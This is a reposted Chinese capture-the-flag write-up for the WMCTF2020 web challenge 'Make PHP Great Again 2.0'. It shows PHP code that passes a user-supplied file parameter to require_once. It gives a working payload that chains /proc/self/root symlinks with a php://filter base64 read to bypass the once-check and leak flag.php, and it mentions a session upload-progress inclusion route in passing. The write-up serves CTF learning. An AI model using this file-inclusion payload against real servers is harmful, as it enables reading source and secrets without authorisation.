web | [WMCTF2020]Make PHP Great Again 2.0

本文转载自查看原文 2021-08-03 17:40 146 ctf题解

开局几行字：

<?php
highlight_file(__FILE__);
require_once 'flag.php';
if(isset($_GET['file'])) {
  require_once $_GET['file'];
}

参考：https://blog.csdn.net/weixin_48537150/article/details/113189052

PHP最新版的小Trick， require_once包含的软链接层数较多时once的hash匹配会直接失效造成重复包含
payload:?file=php://filter/convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/www/html/flag.php

上面的是预期解。

非预期解是利用session.upload_progress进行文件包含。
不再赘述。
over.

免责声明！

本站转载的文章为个人学习借鉴使用，本站对版权不负任何法律责任。如果侵犯了您的隐私权益，请联系本站邮箱yoyou2525@163.com删除。

猜您在找 wmctf2020 Make PHP Great Again WMCTF2020 web之web_checkin WMCTF2020 虚空做题 WMCTF2020密码学部分详解 make the fence great again(dp 二维) RepVGG: Making VGG-style ConvNets Great Again 2020第五空间web hate-php Kali 2.0 Web后门工具----WebaCoo、weevely、PHP Meterpreter 网鼎2020朱雀组 PHP_web+NMAP Unable to make the module: related gradle configuration was not found. Please, re-import the Gradle project and try again